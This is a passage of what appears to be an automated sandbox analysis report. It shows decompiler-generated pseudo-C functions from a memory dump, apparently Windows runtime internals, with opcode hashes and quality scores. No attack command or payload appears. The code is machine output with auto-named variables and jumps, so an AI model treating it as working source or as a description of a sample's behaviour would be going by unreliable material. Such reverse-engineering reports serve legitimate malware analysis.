                                          							_v1060 = _t118;
                                          							__eflags = _t113;
                                          							if(_t113 == 0) {
                                          								goto L10;
                                          							}
                                          							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                          							goto L11;
                                          						}
                                          						_t118 =  *((intOrPtr*)(_t102 + 8));
                                          						__eflags = _t118 - _a20;
                                          						if(_t118 <= _a20) {
                                          							_t114 =  *(_t102 + 4);
                                          							_t77 = _t118;
                                          							goto L26;
                                          						}
                                          						_v1060 = _t118;
                                          						goto L10;
                                          					}
                                          					__eflags = _t122 - 0x80000005;
                                          					if(_t122 != 0x80000005) {
                                          						goto L15;
                                          					}
                                          					L00F377F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                          					L18:
                                          					_t121 = _v1060;
                                          					goto L19;
                                          				}
                                          				_push( &_v1060);
                                          				_push(0x400);
                                          				_t102 =  &_v1036;
                                          				_push(_t102);
                                          				_push(2);
                                          				_push( &_v1048);
                                          				_push(_t116);
                                          				_t122 = E00F59650();
                                          				if(_t122 >= 0) {
                                          					__eflags = 0;
                                          					_v1052 = 0;
                                          					goto L7;
                                          				}
                                          				if(_t122 == 0x80000005) {
                                          					goto L18;
                                          				}
                                          				goto L4;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • Opcode ID: b01c468b7ef8c1599acca1919eb1bb129499cdfb42115c6cc51d6a0e60768021
                                          • Instruction ID: ae71d7e2c6a617e4da6421916137b21e4446acebac4f4e0de368de43cda7e5ea
                                          • Opcode Fuzzy Hash: b01c468b7ef8c1599acca1919eb1bb129499cdfb42115c6cc51d6a0e60768021
                                          • Instruction Fuzzy Hash: 53819276A483018BCB25FE14C881BAEB3A5FB84364F34486AFD459B255D334ED44EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E00FAB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _t80;
                                          				signed int _t83;
                                          				intOrPtr _t89;
                                          				signed int _t92;
                                          				signed char _t106;
                                          				signed int* _t107;
                                          				intOrPtr _t108;
                                          				intOrPtr _t109;
                                          				signed int _t114;
                                          				void* _t115;
                                          				void* _t117;
                                          				void* _t119;
                                          				void* _t122;
                                          				signed int _t123;
                                          				signed int* _t124;
                                          
                                          				_t106 = _a12;
                                          				if((_t106 & 0xfffffffc) != 0) {
                                          					return 0xc000000d;
                                          				}
                                          				if((_t106 & 0x00000002) != 0) {
                                          					_t106 = _t106 | 0x00000001;
                                          				}
                                          				_t109 =  *0x1007b9c; // 0x0
                                          				_t124 = L00F34620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                          				if(_t124 != 0) {
                                          					 *_t124 =  *_t124 & 0x00000000;
                                          					_t124[1] = _t124[1] & 0x00000000;
                                          					_t124[4] = _t124[4] & 0x00000000;
                                          					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                          						L13:
                                          						_push(_t124);
                                          						if((_t106 & 0x00000002) != 0) {
                                          							_push(0x200);
                                          							_push(0x28);
                                          							_push(0xffffffff);
                                          							_t122 = E00F59800();
                                          							if(_t122 < 0) {
                                          								L33:
                                          								if((_t124[4] & 0x00000001) != 0) {
                                          									_push(4);
                                          									_t64 =  &(_t124[1]); // 0x4
                                          									_t107 = _t64;
                                          									_push(_t107);
                                          									_push(5);
                                          									_push(0xfffffffe);
                                          									E00F595B0();
                                          									if( *_t107 != 0) {
                                          										_push( *_t107);
                                          										E00F595D0();
                                          									}
                                          								}
                                          								_push(_t124);
                                          								_push(0);
                                          								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                          								L37:
                                          								L00F377F0();
                                          								return _t122;
                                          							}
                                          							_t124[4] = _t124[4] | 0x00000002;
                                          							L18:
                                          							_t108 = _a8;
                                          							_t29 =  &(_t124[0x105]); // 0x414
                                          							_t80 = _t29;
                                          							_t30 =  &(_t124[5]); // 0x14
                                          							_t124[3] = _t80;
                                          							_t123 = 0;
                                          							_t124[2] = _t30;
                                          							 *_t80 = _t108;
                                          							if(_t108 == 0) {
                                          								L21:
                                          								_t112 = 0x400;
                                          								_push( &_v8);
                                          								_v8 = 0x400;
                                          								_push(_t124[2]);
                                          								_push(0x400);
                                          								_push(_t124[3]);
                                          								_push(0);
                                          								_push( *_t124);
                                          								_t122 = E00F59910();
                                          								if(_t122 != 0xc0000023) {
                                          									L26:
                                          									if(_t122 != 0x106) {
                                          										L40:
                                          										if(_t122 < 0) {
                                          											L29:
                                          											_t83 = _t124[2];
                                          											if(_t83 != 0) {
                                          												_t59 =  &(_t124[5]); // 0x14
                                          												if(_t83 != _t59) {
                                          													L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                          												}
                                          											}
                                          											_push( *_t124);
                                          											E00F595D0();
                                          											goto L33;
                                          										}
                                          										 *_a16 = _t124;
                                          										return 0;
                                          									}
                                          									if(_t108 != 1) {
                                          										_t122 = 0;
                                          										goto L40;
                                          									}
                                          									_t122 = 0xc0000061;
                                          									goto L29;
                                          								} else {
                                          									goto L22;
                                          								}
                                          								while(1) {
                                          									L22:
                                          									_t89 =  *0x1007b9c; // 0x0
                                          									_t92 = L00F34620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                          									_t124[2] = _t92;
                                          									if(_t92 == 0) {
                                          										break;
                                          									}
                                          									_t112 =  &_v8;
                                          									_push( &_v8);
                                          									_push(_t92);
                                          									_push(_v8);
                                          									_push(_t124[3]);
                                          									_push(0);
                                          									_push( *_t124);
                                          									_t122 = E00F59910();
                                          									if(_t122 != 0xc0000023) {
                                          										goto L26;
                                          									}
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                          								}
                                          								_t122 = 0xc0000017;
                                          								goto L26;
                                          							}
                                          							_t119 = 0;
                                          							do {
                                          								_t114 = _t124[3];
                                          								_t119 = _t119 + 0xc;
                                          								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                          								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                          								_t123 = _t123 + 1;
                                          								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                          							} while (_t123 < _t108);
                                          							goto L21;
                                          						}
                                          						_push(0x28);
                                          						_push(3);
                                          						_t122 = E00F1A7B0();
                                          						if(_t122 < 0) {
                                          							goto L33;
                                          						}
                                          						_t124[4] = _t124[4] | 0x00000001;
                                          						goto L18;
                                          					}
                                          					if((_t106 & 0x00000001) == 0) {
                                          						_t115 = 0x28;
                                          						_t122 = E00FAE7D3(_t115, _t124);
                                          						if(_t122 < 0) {
                                          							L9:
                                          							_push(_t124);
                                          							_push(0);
                                          							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                          							goto L37;
                                          						}
                                          						L12:
                                          						if( *_t124 != 0) {
                                          							goto L18;
                                          						}
                                          						goto L13;
                                          					}
                                          					_t15 =  &(_t124[1]); // 0x4
                                          					_t117 = 4;
                                          					_t122 = E00FAE7D3(_t117, _t15);
                                          					if(_t122 >= 0) {
                                          						_t124[4] = _t124[4] | 0x00000001;
                                          						_v12 = _v12 & 0x00000000;
                                          						_push(4);
                                          						_push( &_v12);
                                          						_push(5);
                                          						_push(0xfffffffe);
                                          						E00F595B0();
                                          						goto L12;
                                          					}
                                          					goto L9;
                                          				} else {
                                          					return 0xc0000017;
                                          				}
                                          			}

                                          0x00fab94d
                                          0x00fab98f
                                          0x00fab995
                                          0x00fab999
                                          0x00fab960
                                          0x00fab967
                                          0x00fab968
                                          0x00fab96a
                                          0x00000000
                                          0x00fab96a
                                          0x00fab99b
                                          0x00fab99e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00fab99e
                                          0x00fab951
                                          0x00fab954
                                          0x00fab95a
                                          0x00fab95e
                                          0x00fab972
                                          0x00fab979
                                          0x00fab97d
                                          0x00fab97f
                                          0x00fab980
                                          0x00fab982
                                          0x00fab984
                                          0x00000000
                                          0x00fab984
                                          0x00000000
                                          0x00fab926
                                          0x00000000
                                          0x00fab926

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb1bd562ee1bd3337485de377a67acfdb1c025ef2d1242200c0b3f2f7e274d9a
                                          • Instruction ID: 477d45e909d8044e4df0374e6199cb83e046797a737db82010702318edf1b4b1
                                          • Opcode Fuzzy Hash: bb1bd562ee1bd3337485de377a67acfdb1c025ef2d1242200c0b3f2f7e274d9a
                                          • Instruction Fuzzy Hash: 327130B2600B01EFD7328F24CC41F56BBE5EF46720F244528EA55872E2DB79E940EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00F152A5(char __ecx) {
                                          				char _v20;
                                          				char _v28;
                                          				char _v29;
                                          				void* _v32;
                                          				void* _v36;
                                          				void* _v37;
                                          				void* _v38;
                                          				void* _v40;
                                          				void* _v46;
                                          				void* _v64;
                                          				void* __ebx;
                                          				intOrPtr* _t49;
                                          				signed int _t53;
                                          				short _t85;
                                          				signed int _t87;
                                          				signed int _t88;
                                          				signed int _t89;
                                          				intOrPtr _t101;
                                          				intOrPtr* _t102;
                                          				intOrPtr* _t104;
                                          				signed int _t106;
                                          				void* _t108;
                                          
                                          				_t93 = __ecx;
                                          				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                          				_push(_t88);
                                          				_v29 = __ecx;
                                          				_t89 = _t88 | 0xffffffff;
                                          				while(1) {
                                          					E00F2EEF0(0x10079a0);
                                          					_t104 =  *0x1008210; // 0xaa2ca0
                                          					if(_t104 == 0) {
                                          						break;
                                          					}
                                          					asm("lock inc dword [esi]");
                                          					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                          					E00F2EB70(_t93, 0x10079a0);
                                          					if( *((char*)(_t108 + 0xf)) != 0) {
                                          						_t101 =  *0x7ffe02dc;
                                          						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                          						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                          							L9:
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0x90028);
                                          							_push(_t108 + 0x20);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *((intOrPtr*)(_t104 + 4)));
                                          							_t53 = E00F59890();
                                          							__eflags = _t53;
                                          							if(_t53 >= 0) {
                                          								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                          								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                          									E00F2EEF0(0x10079a0);
                                          									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                          									E00F2EB70(0, 0x10079a0);
                                          								}
                                          								goto L3;
                                          							}
                                          							__eflags = _t53 - 0xc0000012;
                                          							if(__eflags == 0) {
                                          								L12:
                                          								_t13 = _t104 + 0xc; // 0xaa2cad
                                          								_t93 = _t13;
                                          								 *((char*)(_t108 + 0x12)) = 0;
                                          								__eflags = E00F4F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                          								if(__eflags >= 0) {
                                          									L15:
                                          									_t102 = _v28;
                                          									 *_t102 = 2;
                                          									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          									E00F2EEF0(0x10079a0);
                                          									__eflags =  *0x1008210 - _t104; // 0xaa2ca0
                                          									if(__eflags == 0) {
                                          										__eflags =  *((char*)(_t108 + 0xe));
                                          										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                          										 *0x1008210 = _t102;
                                          										_t32 = _t102 + 0xc; // 0x0
                                          										 *_t95 =  *_t32;
                                          										_t33 = _t102 + 0x10; // 0x0
                                          										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                          										_t35 = _t102 + 4; // 0xffffffff
                                          										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                          										if(__eflags != 0) {
                                          											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                          											E00F94888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                          										}
                                          										E00F2EB70(_t95, 0x10079a0);
                                          										asm("lock xadd [esi], eax");
                                          										if(__eflags == 0) {
                                          											_push( *((intOrPtr*)(_t104 + 4)));
                                          											E00F595D0();
                                          											L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          										}
                                          										asm("lock xadd [esi], ebx");
                                          										__eflags = _t89 == 1;
                                          										if(_t89 == 1) {
                                          											_push( *((intOrPtr*)(_t104 + 4)));
                                          											E00F595D0();
                                          											L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          										}
                                          										_t49 = _t102;
                                          										L4:
                                          										return _t49;
                                          									}
                                          									E00F2EB70(_t93, 0x10079a0);
                                          									asm("lock xadd [esi], eax");
                                          									if(__eflags == 0) {
                                          										_push( *((intOrPtr*)(_t104 + 4)));
                                          										E00F595D0();
                                          										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          									}
                                          									 *_t102 = 1;
                                          									asm("lock xadd [edi], eax");
                                          									if(__eflags == 0) {
                                          										_t28 = _t102 + 4; // 0xffffffff
                                          										_push( *_t28);
                                          										E00F595D0();
                                          										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                          									}
                                          									continue;
                                          								}
                                          								_t93 =  &_v20;
                                          								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                          								_t85 = 6;
                                          								_v20 = _t85;
                                          								_t87 = E00F4F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                          								__eflags = _t87;
                                          								if(_t87 < 0) {
                                          									goto L3;
                                          								}
                                          								 *((char*)(_t108 + 0xe)) = 1;
                                          								goto L15;
                                          							}
                                          							__eflags = _t53 - 0xc000026e;
                                          							if(__eflags != 0) {
                                          								goto L3;
                                          							}
                                          							goto L12;
                                          						}
                                          						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                          						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                          							goto L3;
                                          						} else {
                                          							goto L9;
                                          						}
                                          					}
                                          					L3:
                                          					_t49 = _t104;
                                          					goto L4;
                                          				}
                                          				_t49 = 0;
                                          				goto L4;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36c8a9b86f55df1ddc2242e9ac5b045d2b3119d6527d176b957e2453c2483ef7
                                          • Instruction ID: 223e9581866cfb8bb376287e37635fb5f3e19ef5f20502c4978696788465a1d6
                                          • Opcode Fuzzy Hash: 36c8a9b86f55df1ddc2242e9ac5b045d2b3119d6527d176b957e2453c2483ef7
                                          • Instruction Fuzzy Hash: 0251BB72204781EBD7219F64C841B66BBA4FF90B20F14491EF49987652EB78E844E792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F42AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                          				signed short* _v8;
                                          				signed short* _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr* _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				short _t56;
                                          				signed int _t57;
                                          				intOrPtr _t58;
                                          				signed short* _t61;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				intOrPtr _t84;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t90;
                                          				signed short* _t91;
                                          				signed int _t95;
                                          				signed short* _t96;
                                          				intOrPtr _t97;
                                          				intOrPtr _t102;
                                          				signed int _t108;
                                          				intOrPtr _t110;
                                          				signed int _t111;
                                          				signed short* _t112;
                                          				void* _t113;
                                          				signed int _t116;
                                          				signed short** _t119;
                                          				short* _t120;
                                          				signed int _t123;
                                          				signed int _t124;
                                          				void* _t125;
                                          				intOrPtr _t127;
                                          				signed int _t128;
                                          
                                          				_t90 = __ecx;
                                          				_v16 = __edx;
                                          				_t108 = _a4;
                                          				_v28 = __ecx;
                                          				_t4 = _t108 - 1; // -1
                                          				if(_t4 > 0x13) {
                                          					L15:
                                          					_t56 = 0xc0000100;
                                          					L16:
                                          					return _t56;
                                          				}
                                          				_t57 = _t108 * 0x1c;
                                          				_v32 = _t57;
                                          				_t6 = _t57 + 0x1008204; // 0x0
                                          				_t123 =  *_t6;
                                          				_t7 = _t57 + 0x1008208; // 0x1008207
                                          				_t8 = _t57 + 0x1008208; // 0x1008207
                                          				_t119 = _t8;
                                          				_v36 = _t123;
                                          				_t110 = _t7 + _t123 * 8;
                                          				_v24 = _t110;
                                          				_t111 = _a4;
                                          				if(_t119 >= _t110) {
                                          					L12:
                                          					if(_t123 != 3) {
                                          						_t58 =  *0x1008450; // 0x0
                                          						if(_t58 == 0) {
                                          							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                          						}
                                          					} else {
                                          						_t26 = _t57 + 0x100821c; // 0x0
                                          						_t58 =  *_t26;
                                          					}
                                          					 *_t90 = _t58;
                                          					goto L15;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				while(1) {
                                          					_t116 =  *_t61 & 0x0000ffff;
                                          					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                          					if(_t116 == _t128) {
                                          						goto L18;
                                          					}
                                          					L5:
                                          					if(_t116 >= 0x61) {
                                          						if(_t116 > 0x7a) {
                                          							_t97 =  *0x1006d5c; // 0x7f610654
                                          							_t72 =  *0x1006d5c; // 0x7f610654
                                          							_t75 =  *0x1006d5c; // 0x7f610654
                                          							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                          						} else {
                                          							_t116 = _t116 - 0x20;
                                          						}
                                          					}
                                          					if(_t128 >= 0x61) {
                                          						if(_t128 > 0x7a) {
                                          							_t102 =  *0x1006d5c; // 0x7f610654
                                          							_t84 =  *0x1006d5c; // 0x7f610654
                                          							_t87 =  *0x1006d5c; // 0x7f610654
                                          							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                          						} else {
                                          							_t128 = _t128 - 0x20;
                                          						}
                                          					}
                                          					if(_t116 == _t128) {
                                          						_t61 = _v12;
                                          						_t96 = _v8;
                                          					} else {
                                          						_t113 = _t116 - _t128;
                                          						L9:
                                          						_t111 = _a4;
                                          						if(_t113 == 0) {
                                          							_t115 =  &(( *_t119)[_t111 + 1]);
                                          							_t33 =  &(_t119[1]); // 0x100
                                          							_t120 = _a8;
                                          							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                          							_t35 = _t95 - 1; // 0xff
                                          							_t124 = _t35;
                                          							if(_t120 == 0) {
                                          								L27:
                                          								 *_a16 = _t95;
                                          								_t56 = 0xc0000023;
                                          								goto L16;
                                          							}
                                          							if(_t124 >= _a12) {
                                          								if(_a12 >= 1) {
                                          									 *_t120 = 0;
                                          								}
                                          								goto L27;
                                          							}
                                          							 *_a16 = _t124;
                                          							_t125 = _t124 + _t124;
                                          							E00F5F3E0(_t120, _t115, _t125);
                                          							_t56 = 0;
                                          							 *((short*)(_t125 + _t120)) = 0;
                                          							goto L16;
                                          						}
                                          						_t119 =  &(_t119[2]);
                                          						if(_t119 < _v24) {
                                          							L2:
                                          							_t91 =  *_t119;
                                          							_t61 = _t91;
                                          							_v12 = _t61;
                                          							_t112 =  &(_t61[_t111]);
                                          							_v8 = _t112;
                                          							if(_t61 >= _t112) {
                                          								break;
                                          							} else {
                                          								_t127 = _v16 - _t91;
                                          								_t96 = _t112;
                                          								_v20 = _t127;
                                          								_t116 =  *_t61 & 0x0000ffff;
                                          								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                          								if(_t116 == _t128) {
                                          									goto L18;
                                          								}
                                          								goto L5;
                                          							}
                                          						} else {
                                          							_t90 = _v28;
                                          							_t57 = _v32;
                                          							_t123 = _v36;
                                          							goto L12;
                                          						}
                                          					}
                                          					L18:
                                          					_t61 =  &(_t61[1]);
                                          					_v12 = _t61;
                                          					if(_t61 >= _t96) {
                                          						break;
                                          					}
                                          					_t127 = _v20;
                                          				}
                                          				_t113 = 0;
                                          				goto L9;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 902eb653e8a65848a08afc0b0822623f4ac60eaafe0c8da76c8295b1155a2147
                                          • Instruction ID: 44c352a8c33c668662a045bd912b2f69254b6f9ed5a225237cb9cb31689c31d4
                                          • Opcode Fuzzy Hash: 902eb653e8a65848a08afc0b0822623f4ac60eaafe0c8da76c8295b1155a2147
                                          • Instruction Fuzzy Hash: 2351BE76E005158FCB54DF1CC8809BDBBB2FBC8700B55846AFC869B315D735AA91EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00F3DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				char _v5;
                                          				signed int _v12;
                                          				signed int* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t54;
                                          				char* _t58;
                                          				signed int _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				intOrPtr _t72;
                                          				intOrPtr _t73;
                                          				signed int* _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr _t80;
                                          				char _t82;
                                          				signed int _t83;
                                          				signed int _t84;
                                          				signed int _t88;
                                          				signed int _t89;
                                          				intOrPtr _t90;
                                          				intOrPtr _t92;
                                          				signed int _t97;
                                          				intOrPtr _t98;
                                          				intOrPtr* _t99;
                                          				signed int* _t101;
                                          				signed int* _t102;
                                          				intOrPtr* _t103;
                                          				intOrPtr _t105;
                                          				signed int _t106;
                                          				void* _t118;
                                          
                                          				_t92 = __edx;
                                          				_t75 = _a4;
                                          				_t98 = __ecx;
                                          				_v44 = __edx;
                                          				_t106 = _t75[1];
                                          				_v40 = __ecx;
                                          				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                          					_t82 = 0;
                                          				} else {
                                          					_t82 = 1;
                                          				}
                                          				_v5 = _t82;
                                          				_t6 = _t98 + 0xc8; // 0xc9
                                          				_t101 = _t6;
                                          				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                          				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                          				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                          				if(_t82 != 0) {
                                          					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                          					_t83 =  *_t75;
                                          					_t54 = _t75[1];
                                          					 *_t101 = _t83;
                                          					_t84 = _t83 | _t54;
                                          					_t101[1] = _t54;
                                          					if(_t84 == 0) {
                                          						_t101[1] = _t101[1] & _t84;
                                          						 *_t101 = 1;
                                          					}
                                          					goto L19;
                                          				} else {
                                          					if(_t101 == 0) {
                                          						E00F1CC50(E00F14510(0xc000000d));
                                          						_t88 =  *_t101;
                                          						_t97 = _t101[1];
                                          						L15:
                                          						_v12 = _t88;
                                          						_t66 = _t88 -  *_t75;
                                          						_t89 = _t97;
                                          						asm("sbb ecx, [ebx+0x4]");
                                          						_t118 = _t89 - _t97;
                                          						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                          							_t66 = _t66 | 0xffffffff;
                                          							_t89 = 0x7fffffff;
                                          						}
                                          						 *_t101 = _t66;
                                          						_t101[1] = _t89;
                                          						L19:
                                          						if(E00F37D50() != 0) {
                                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t58 = 0x7ffe0386;
                                          						}
                                          						_t102 = _v16;
                                          						if( *_t58 != 0) {
                                          							_t58 = E00FE8ED6(_t102, _t98);
                                          						}
                                          						_t76 = _v44;
                                          						E00F32280(_t58, _v44);
                                          						E00F3DD82(_v44, _t102, _t98);
                                          						E00F3B944(_t102, _v5);
                                          						return E00F2FFB0(_t76, _t98, _t76);
                                          					}
                                          					_t99 = 0x7ffe03b0;
                                          					do {
                                          						_t103 = 0x7ffe0010;
                                          						do {
                                          							_t67 =  *0x1008628; // 0x0
                                          							_v28 = _t67;
                                          							_t68 =  *0x100862c; // 0x0
                                          							_v32 = _t68;
                                          							_v24 =  *((intOrPtr*)(_t99 + 4));
                                          							_v20 =  *_t99;
                                          							while(1) {
                                          								_t97 =  *0x7ffe000c;
                                          								_t90 =  *0x7FFE0008;
                                          								if(_t97 ==  *_t103) {
                                          									goto L10;
                                          								}
                                          								asm("pause");
                                          							}
                                          							L10:
                                          							_t79 = _v24;
                                          							_t99 = 0x7ffe03b0;
                                          							_v12 =  *0x7ffe03b0;
                                          							_t72 =  *0x7FFE03B4;
                                          							_t103 = 0x7ffe0010;
                                          							_v36 = _t72;
                                          						} while (_v20 != _v12 || _t79 != _t72);
                                          						_t73 =  *0x1008628; // 0x0
                                          						_t105 = _v28;
                                          						_t80 =  *0x100862c; // 0x0
                                          					} while (_t105 != _t73 || _v32 != _t80);
                                          					_t98 = _v40;
                                          					asm("sbb edx, [ebp-0x20]");
                                          					_t88 = _t90 - _v12 - _t105;
                                          					_t75 = _a4;
                                          					asm("sbb edx, eax");
                                          					_t31 = _t98 + 0xc8; // 0xfdfb53
                                          					_t101 = _t31;
                                          					 *_t101 = _t88;
                                          					_t101[1] = _t97;
                                          					goto L15;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d42b294313cf7d6b1d280c5d3213186f39f16be880052e6334b5b23818e822c1
                                          • Instruction ID: f357d64db0221104c0dada1f6265d0a0677b11c0d9ba3570373bd057f6fc5592
                                          • Opcode Fuzzy Hash: d42b294313cf7d6b1d280c5d3213186f39f16be880052e6334b5b23818e822c1
                                          • Instruction Fuzzy Hash: C451BEB1E00609CFCB14DFA8D880AAEFBF5BF48360F21815AD995A7344DB35AD44DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E00FE740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                          				signed short* _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _t55;
                                          				void* _t56;
                                          				intOrPtr* _t66;
                                          				intOrPtr* _t69;
                                          				void* _t74;
                                          				intOrPtr* _t78;
                                          				intOrPtr* _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr _t83;
                                          				signed short* _t84;
                                          				intOrPtr _t85;
                                          				signed int _t87;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t93;
                                          				intOrPtr* _t94;
                                          				void* _t98;
                                          
                                          				_t84 = __edx;
                                          				_t80 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t55 = __ecx;
                                          				_v8 = __edx;
                                          				_t87 =  *__edx & 0x0000ffff;
                                          				_v12 = __ecx;
                                          				_t3 = _t55 + 0x154; // 0x154
                                          				_t93 = _t3;
                                          				_t78 =  *_t93;
                                          				_t4 = _t87 + 2; // 0x2
                                          				_t56 = _t4;
                                          				while(_t78 != _t93) {
                                          					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                          						L4:
                                          						_t78 =  *_t78;
                                          						continue;
                                          					} else {
                                          						_t7 = _t78 + 0x18; // 0x18
                                          						if(E00F6D4F0(_t7, _t84[2], _t87) == _t87) {
                                          							_t40 = _t78 + 0xc; // 0xc
                                          							_t94 = _t40;
                                          							_t90 =  *_t94;
                                          							while(_t90 != _t94) {
                                          								_t41 = _t90 + 8; // 0x8
                                          								_t74 = E00F5F380(_a4, _t41, 0x10);
                                          								_t98 = _t98 + 0xc;
                                          								if(_t74 != 0) {
                                          									_t90 =  *_t90;
                                          									continue;
                                          								}
